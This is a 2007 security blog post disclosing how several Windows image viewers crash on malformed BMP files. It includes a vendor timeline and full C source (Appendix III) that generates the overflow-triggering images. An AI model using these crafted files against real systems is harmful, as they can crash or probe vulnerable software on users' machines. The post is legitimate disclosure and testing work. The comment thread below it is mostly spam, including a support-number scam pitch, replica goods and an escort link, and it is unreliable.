Wednesday, April 4, 2007
Several Windows image viewers vulnerabilities
Table of contents
1. Introduction
2. Description of experiments
3. Image viewers
4. Experimental results
5. Concluding remarks
Appendix I - Timeline
Appendix II - A possible Win XP SP1 vulnerability
Appendix III - Source code
1. Introduction
The purpose of this post is to present a small research covering security of several popular Windows image viewers. Although, when discussing security of image viewing software, web browsers are usually implied, since they will be on the 'front lines' in the unsafe environment such as the Internet, there are cases in which you may open potentially dangerous image file with your favorite image viewer. Some examples are:
- If you click on the attachment in your email application
- If you click on a file in an archive (such as zip or rar) you downloaded or got by email
- If you open a file on a network shared folder
- If you download the file using p2p programs such as BitTorrent and eMule
2. Description of experiments
The experiments were conducted as follows: Several errornous windows bitmap (.bmp) files were specially crafted to cause buffer overflows in certain cases, if such cases are not handled properly by the opening application. Each of these images was opend with all of the viewers included in this research and unexpected viewer behavior was noted. Here is the list of images used with their short descriptions.
paletteof1.bmp
This file defines a colormap larger than 256 entries (max allowed)
paletteof2.bmp
Similar to paletteof1.bmp, except the colormap is even larger
rle8of1.bmp
Uses run-length encoded blocks that extend beyond the image dimensions
rle8of2.bmp
Similar to rle8of1 except errornous RLE blocks start with a different offset
rle8of3.bmp
Uses xoffset and yoffset command in RLE encoded bmp in order to escape past image boundaries, then uses non-RLE encoded blocks to write data
rle8of4.bmp
similar to rle8of4.bmp except it doesn't use xoffset and yoffset, but still specififies enough non-RLE encoded blocks to escape image boundaries
wh3intof.bmp
Image dimensions are set so that width*height*3 causes integer overflow in 32-bit processors thus causing the amount of memory allocated for the storage of bitmap bits to be smaller than the actual data provided
wh4intof.bmp
Image dimensions are set so that width*height*4 causes integer overflow in 32-bit processors thus causing the amount of memory allocated for the storage of bitmap bits to be smaller than the actual data provided
w3intof.bmp
Image dimensions are set so that width*3 causes integer overflow in 32-bit processors thus causing the amount of memory allocated for the storage of a single bitmap row to be smaller than the actual data provided
w4intof.bmp
Image dimensions are set so that width*4 causes integer overflow in 32-bit processors thus causing the amount of memory allocated for the storage of a single bitmap row to be smaller than the actual data provided
The code used to generate all of the above images is provided in Appendix III, so you can use it to test your favorite image viewer if it was not included here.
3. Image viewers
Several popular image viewers were selected for this test. The most recent version of these viewers at the time of testing was used. The viewers are
ACDSee 9.0 Photo Manager
IrfranView 3.99
FastStone Image Viewer 2.9
4. Experimental results
Test system: Windows XP SP2 on Mobile AMD Sempron 3000+, 512MB RAM
ACDSee 9.0 Photo Manager
w4intof.bmp - Application closes
ACDSee 9.0 Quick View
w3intof.bmp - Microsoft Visual C++ Runtime Library: Runtime Error
w4intof.bmp - Application crashes, Exception code 0xc0000005 (access violation)
IrfranView 3.99
rle8of3.bmp - Application crashes, Exception code 0xc0000005 (access violation)
rle8of4.bmp - Application crashes, The memory could not be "written" Application error
FastStone Image Viewer 2.9
wh3intof.bmp - Application window closes, however application keeps running in the background consuming 100% of CPU resource
wh4intof.bmp - Application closes
5. Concluding remarks
All of the applications tested showed some sort of unpredicted behavior on some of the images, demonstrating the need to further enhance the security of products of this type. Accessing memory locations outside the allowed space, possible in some applications as demonstrated above, is especially dangerous since it has a potential for being exploited by a malicious hacker to execute arbitrary code on the unsuspecting user's computer. Other vulnerabilities should also not be disregarded since they could, in theory at least, be used in Dos attacks.
Since no actual code execution was analysed in detail, it is impossible to say from the above just what consequences could any of the above have. I leave this analysis to the vendors of applications tested.
Note that this small research only covers bmp images, so that the presence of various other vulnerabilities is also possible (if not probable) in the code used to handle decoding of images in other formats.
All in all, best be carefull next time you click on that image of Britney Spears' shaved ... head :-)
Appendix I - Timeline
Feb 15 2007 - Experiments made
Feb 18 2007 - 1st attempt to contact vendors
Feb 19 2007 - IrfranView programmer responded, said the code would be fixed in the upcoming version, due out soon
Feb 21 2007 - 2nd attempt to contact remaining vendors
Feb 23 2007 - Got response from ACD System support saying that they forwarded the information to the Quality Assurance and that they would contact me when they hear back from them. Never heard from them after that.
Apr 04 2007 - Release of this report
Note: It is possible that some of the bugs mentioned here were fixed quietly. I didn't check.
Appendix II - A possible Win XP SP1 vulnerability
On an old machine running Windows XP SP1 I encountered unusual behavior with one of my test images. When clicking on the w4intof.bmp in Windows Explorer (with the file details pane on the left of the window turned on) or viewing files as thumbnails in the containing folder, the Explorer crashes and Windows reports the exception code 0xc0000005, indicating a possible overflow. It is possible that Windows Explorer in SP1 too suffers from this kind of vulnerability. However I only had that one machine with SP1 installed and on the machines with other windows versions (such as XP SP2) I didn't encounter any unusual behavior. I wrote to Microsoft about this promply after discovery. They responded that they no longer support XP SP1 and this is not something they would investigate for for an out-of-support product.
Appendix III - Source code
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
struct BITMAPFILEHEADER {
unsigned int bfSize;
unsigned int bfReserved;
unsigned int bfOffBits;
};
struct BITMAPINFOHEADER {
unsigned int biSize;
unsigned int biWidth;
unsigned int biHeight;
unsigned short biPlanes;
unsigned short biBitCount;
unsigned int biCompression;
unsigned int biSizeImage;
unsigned int biXPelsPerMeter;
unsigned int biYPelsPerMeter;
unsigned int biClrUsed;
unsigned int biClrImportant;
};
void writebmp(char *filename, unsigned long width, unsigned long height, unsigned int bpp, unsigned int compression, unsigned char *palette, long numpalettecolors, unsigned char *data, long numdatabytes) {
BITMAPFILEHEADER fileheader;
BITMAPINFOHEADER infoheader;
memset(&fileheader,0,sizeof(BITMAPFILEHEADER));
memset(&infoheader,0,sizeof(BITMAPINFOHEADER));
unsigned char sig[2];
sig[0] = 'B';
sig[1] = 'M';
fileheader.bfSize = sizeof(sig)+sizeof(BITMAPFILEHEADER)+sizeof(BITMAPINFOHEADER)+numpalettecolors*4+numdatabytes;
fileheader.bfOffBits = sizeof(sig)+sizeof(BITMAPFILEHEADER)+sizeof(BITMAPINFOHEADER)+numpalettecolors*4;
infoheader.biSize = 40;
infoheader.biWidth = width;
infoheader.biHeight = height;
infoheader.biPlanes = 1;
infoheader.biBitCount = bpp;
infoheader.biCompression = compression;
infoheader.biClrUsed = numpalettecolors;
FILE *fp = fopen(filename,"wb");
fwrite(&sig,sizeof(sig),1,fp);
fwrite(&fileheader,sizeof(BITMAPFILEHEADER),1,fp);
fwrite(&infoheader,sizeof(BITMAPINFOHEADER),1,fp);
if(palette) fwrite(palette,numpalettecolors*4,1,fp);
fwrite(data,numdatabytes,1,fp);
fclose(fp);
}
int main() {
unsigned char * buf;
buf = (unsigned char *)malloc(4000000);
memset(buf,0,4000000);
unsigned char * buf2;
buf2 = (unsigned char *)malloc(4000000);
memset(buf2,0,4000000);
//overflows specifying too large palette
writebmp("ok8bit.bmp",16,16,8,0,buf,256,buf,16*16);
writebmp("paletteof1.bmp",16,16,8,0,buf,65535,buf,16*16);
writebmp("paletteof2.bmp",16,16,8,0,buf,1000000,buf,16*16);
//integer overflows with image dimensions
writebmp("ok24bit.bmp",16,16,24,0,NULL,0,buf,16*16*4);
writebmp("wh4intof.bmp",32769,32768,24,0,NULL,0,buf,4000000);
writebmp("wh3intof.bmp",37838,37838,24,0,NULL,0,buf,4000000);
writebmp("w4intof.bmp",1073741825,1,24,0,NULL,0,buf,4000000);
writebmp("w3intof.bmp",1431655767,1,24,0,NULL,0,buf,4000000);
//overflows with RLE encoded BMPs
buf2[0]=16;
buf2[1]=0;
writebmp("okRLE.bmp",16,1,8,1,buf,256,buf2,2);
for(long i=0;i<500000;i++) {
buf2[i*2]=255;
buf2[i*2+1]=0;
}
writebmp("rle8of1.bmp",16,1,8,1,buf,256,buf2,1000000);
buf2[0]=15;
buf2[1]=0;
for(long i=1;i<500000;i++) {
buf2[i*2]=255;
buf2[i*2+1]=0;
}
writebmp("rle8of2.bmp",16,1,8,1,buf,256,buf2,1000000);
memset(buf2,0,4000000);
buf2[0]=0;
buf2[1]=2;
buf2[2]=255;
buf2[3]=0;
for(long i=4;i<100000-1;) {
buf2[i]=0;
buf2[i+1]=254;
i+=255;
}
writebmp("rle8of3.bmp",16,1,8,1,buf,256,buf2,1000000);
memset(buf2,0,4000000);
for(long i=0;i<100000-1;) {
buf2[i]=0;
buf2[i+1]=254;
i+=255;
}
writebmp("rle8of4.bmp",16,1,8,1,buf,256,buf2,1000000);
}
Subscribe to:
Post Comments (Atom)
259 comments:
«Oldest ‹Older 201 – 259 of 259Intuit Data Protect is providing safety to your QuickBooks Data. This won’t let you lose your data, compromise, or save from data corruption with high standards of encryption. While providing security to your QuickBooks data many issues happen in Intuit Data Protect, Even one single wrong step during the troubleshooting can lead to technical reversals such as data loss and corruption of data. Avoid all that by contacting the QuickBooks troubleshooting team at +1-855-738-0359. and redeeming the best troubleshooting services from certified
intuit data protect has stopped working
quickbooks error 6147 0
great blog. keep sharing more.
Artificial Intelligence Training in Chennai
AI Training In Bangalore
Artificial Intelligence Training in Coimbatore
A fantastic post with a great concept I really value your post; please keep on sharing your ideas.
Latest News Updates
fantastic article submit. keep us updated. For all your digital needs, we provide the most affordable quotes. When our clients need assistance or have questions, we are here to help.
The best SEO services in Chennai, digital marketing firms in Chennai, the best SEO firm in Chennai, digital marketing advisors in Chennai, and Chennai-based website designers
The Hologram room in Noida digital marketing firms in Noida the best SEO firm in Noida digital marketing advisors in Noida and Noida based website designers
Thanks for share this helpful post. Aarohan Trust is a Charitable Trust in India towards Feeding Nutritious Meals to School Children Studying in Government & Government-aided Schools. Visit our site to Donate and help The child to there Welfare. "https://aarohan.org.in/"
Donate to Child Welfare
Donate to Charity Online
Thanks for sharing informative article. This a good and great content.Keep sharing with us.
website designing course in rishikesh
Wish to see much more like this. Thanks for sharing your information.
Eimple Labs born to prepare an industry ready workforce. As a product based company Eimple Labs ensures to inculcate the end to end live product development and management skills. We work in a university-industry partnership and implement a holistic knowledge-imparting model to prepare students for new-collar jobs in emerging industries.
If you are looking to book a spa in India, please visit https://tattvaspa.com/
Nice article and explanation Keep continuing to write an article like this you may also check my website
wowimprints
"Your blog has given me such insightful information on the subject that it has deepened my understanding. Thank you for sharing!"
SAP Analytics Cloud Certification
"Your blog has given me such insightful information on the subject that it has deepened my understanding. Thank you for sharing!"
CCSP Certification
"I really enjoyed reading your blog post; it was very well-written and extremely informative."
SAP Analytics Cloud Course
"I really enjoyed reading your blog post; it was very well-written and extremely informative."
SAP Analytics Cloud Certification
The article has a positive influence on the reader. Dark Knight Rises Bane Jacket
The reader finds the article to be insightful. Dark Knight Rises Bane Jacket
I adored your blog post very much! Your observations are so insightful and energizing. It's obvious that you spent a lot of time and effort writing and researching this essay. Your writing is interesting and simple to read, making even difficult subjects seem understandable. Readers like myself who are looking for insightful and well-informed information appreciate you sharing your expertise and viewpoint on this subject. Hopefully you'll write more informative stuff in the future. Continue your excellent job!
SAP Analytics Cloud Training
I adored your blog post very much! Your observations are so insightful and energizing. It's obvious that you spent a lot of time and effort writing and researching this essay. Your writing is interesting and simple to read, making even difficult subjects seem understandable. Readers like myself who are looking for insightful and well-informed information appreciate you sharing your expertise and viewpoint on this subject. Hopefully you'll write more informative stuff in the future. Continue your excellent job!
Salesforce CPQ Certification
Your commitment to producing informative and thought-provoking information is much appreciated. I've learned to depend on your site as a great resource, and I anxiously anticipate your new posts. The excellent job must continue!
Salesforce CPQ Course
Your commitment to producing informative and thought-provoking information is much appreciated. I've learned to depend on your site as a great resource, and I anxiously anticipate your new posts. The excellent job must continue!
Salesforce CPQ Certification
I appreciate you spending the time to share your knowledge and skills. You have not only increased my knowledge of subject but also my interest in it. Keep up the great work, and I'm looking forward to your upcoming posts!
Salesforce CPQ Training
I appreciate you spending the time to share your knowledge and skills. You have not only increased my knowledge of subject but also my interest in it. Keep up the great work, and I'm looking forward to your upcoming posts!
Salesforce CPQ Course
Great great post; it definitely improved my understanding of the subject.
Golang Training
Great great post; it definitely improved my understanding of the subject.
Salesforce CPQ Training
"I wholeheartedly concur with your points; this blog really opened my mind to fresh perspectives!"
Golang Certification
This blog definitely opened my eyes to new perspectives, and I couldn't agree more with what you said.
Golang Course
"I couldn't agree more with your points; this blog really opened my eyes to new ideas!"
Golang Certification
Great blog post, I thought it was both interesting and useful.
Mulesoft Certification
This blog piece was well-written and really interesting, and it made me hungry to check out more of your stuff.
Mulesoft Training
"I found this blog post to be very well written and incredibly informative, and it made me eager to explore more of your content!"
Mulesoft Certification
"Great post, I found it to be really insightful and stimulating!"
Mulesoft Course
Excellent post; I found it to be really thought-provoking and instructive.
Mulesoft Training
"I wholeheartedly concur with your points; this blog post really nails it!"
Mulesoft Course
Great submission list all links are working. this is the best content for us.
Interior Designer in Dehradun
https://jaipur.locanto.me/ID_6563275023/Call-Girl-In-Jaipur-Jaipur-Call-Girl.html
Thank you for your his useful content . Hypervision technologies provide hologram technology which is very useful your business.
Immersive technology in India
Digital twins
360 degree holographic experience
Kamakshi Idol
Gajalakshmi Idol
Ninja forms
It reveals how nicely you perceive this subject. Bookmarked this web page, will come back for extra articles. I found simply the information I already searched everywhere and just couldn’t come across. our listings offer a range of options for еvеry travеlеr. As you stroll through historic nеighborhoods, еnjoy еxquisitе cuisinе, and takе part in intriguing еvеnts, you can makе pricеlеss mеmoriеs.
Browse: Especial Rental
Good balance between depth and accessibility in your writing.
Bus Rental Sharjah
This post is a gem! Your expertise shines through, and I'm grateful for the effort you put into providing such a comprehensive overview. Keep up the excellent work!
Bus for rent\
Your writing style is not only informative but also engaging. You have a unique gift for capturing attention.
Marble in Dubai
Kudos to the author for striking the perfect balance between depth and readability. Your writing style makes learning a delightful experience.
Mini Bus for rent
Great post. Check out Security Guard Training Course.
Great blog post, I thought it was both interesting and useful.
scrum-master-training-in-hyderabad
Ecola is on the forefront of high-tech, low-toxicity methods to combat termites, rodents and other pests without exposing your family and pets to toxic fumes.
Our alternate treatments aren’t just good for the environment. They’re also good for your pocketbook. In most cases, Ecola’s non-chemical treatments are the most convenient and economical methods to rid your home or business of pesky pests.
Your post looks impressive and well researched, now I have to look for red motorcycle jacket cafe racer in reasonable price.
Your blog consistently provides valuable content. This post was especially helpful and timely
Gunna Rapper W Patch Varsity Jacket
Bangalore is a great place for machine learning training with plenty of institutes offering a variety of courses. The best ones usually focus on both theory and practical applications, including real-world projects. When choosing a course, I think it's important to look for trainers with industry experience, as they can provide deeper insights. A
https://nearlearn.com/machine-learning-classroom-training-in-bangalore-india
python course in kochi
replica bottega-veneta shoes
Are you looking for a dating partner? Find dating partner in India with the dating classifieds site. Click here to book your dream date
Good article! Thank you for sharing such an informative and valuable post.
SAP ABAP Training in Hyderabad
digital marketing course
Post a Comment